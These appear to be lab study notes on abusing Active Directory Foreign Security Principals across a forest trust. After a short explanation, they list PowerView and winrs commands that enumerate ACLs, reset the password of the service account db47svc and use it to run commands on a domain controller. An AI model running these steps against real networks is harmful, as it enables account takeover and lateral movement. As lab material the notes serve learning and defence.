- A Foreign Security Principal (FSP) represents a Security Principal in a external forest trust or special identities (like Authenticated Users, Enterprise DCs etc.).
- Only SID of a FSP is stored in the Foreign Security Principal Container which can be resolved using the trust relationship.
- FSP allows external principals to be added to domain local security groups. Thus, allowing such principals to access resources in the forest.
- Often, FSPs are ignored, mis-configured or too complex to change/cleanup in an enterprise making them ripe for abuse.
- Let's enumerate FSPs for the db.local domain using the reverse shell we
have there.
Find-InterestingDomainAcl -ResolveGUIDs -Domain dbvendor.local

Set-DomainUserPassword -Identity db47svc -AccountPassword (ConvertTo-SecureString 'Password@123' -AsPlainText -Force) -Domain dbvendor.local –Verbose

Find-ForeignGroup -Verbose

Get-DomainUser -Domain dbvendor.local | ?{$_.ObjectSid -eq 'S-1-5-21-569087967-1859921580-1949641513-13617'}

winrs -r:db-dc.db.local -u:dbvendor\db47svc -p:Password@123 "hostname"
